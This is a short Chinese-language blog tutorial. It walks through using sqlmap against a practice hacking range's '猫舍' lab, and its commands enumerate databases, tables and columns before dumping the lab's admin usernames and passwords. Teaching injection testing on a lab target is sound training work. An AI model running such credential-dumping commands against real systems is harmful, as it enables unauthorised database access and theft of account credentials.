sqlmap自动检测漏洞并进行渗透

使用案例靶场为上篇文章介绍的封神台---靶场 https://hack.zkaq.cn/   提示：采用开源靶场里面的猫舍进行渗透注入，仅用于安全防范无安全侵犯

1、首先检测是否已经安装成功sqlmap.py开源工具：

sqlmap.py  -h     (-h 为 help帮助的缩写)

由于我安装了python3.9且将python3.9目录下的python.exe改为了python3.exe，所以每次都要携带python。。。如果仅仅安装python2.X则不需要带python 输入命令后出现下面的则证明安装成功且能够正常调用。

 2、直接爆库

 sqlmap.py -u "URL" --dbs --batch(可以直接查看当前使用那些数据库)

 3、通过库进行爆表

　　 sqlmap.py -u "URL" -D 库名 --tables --batch （直接能够爆出库中的所有表）

4、直接爆表中的字段以及类型：

　　 sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin --columns --batch

5、直接爆表中的会员账户号以及密码：

　　 sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -C Id,password,username --dump

 

爆破成功，更多安全性问题关注博主，后期更新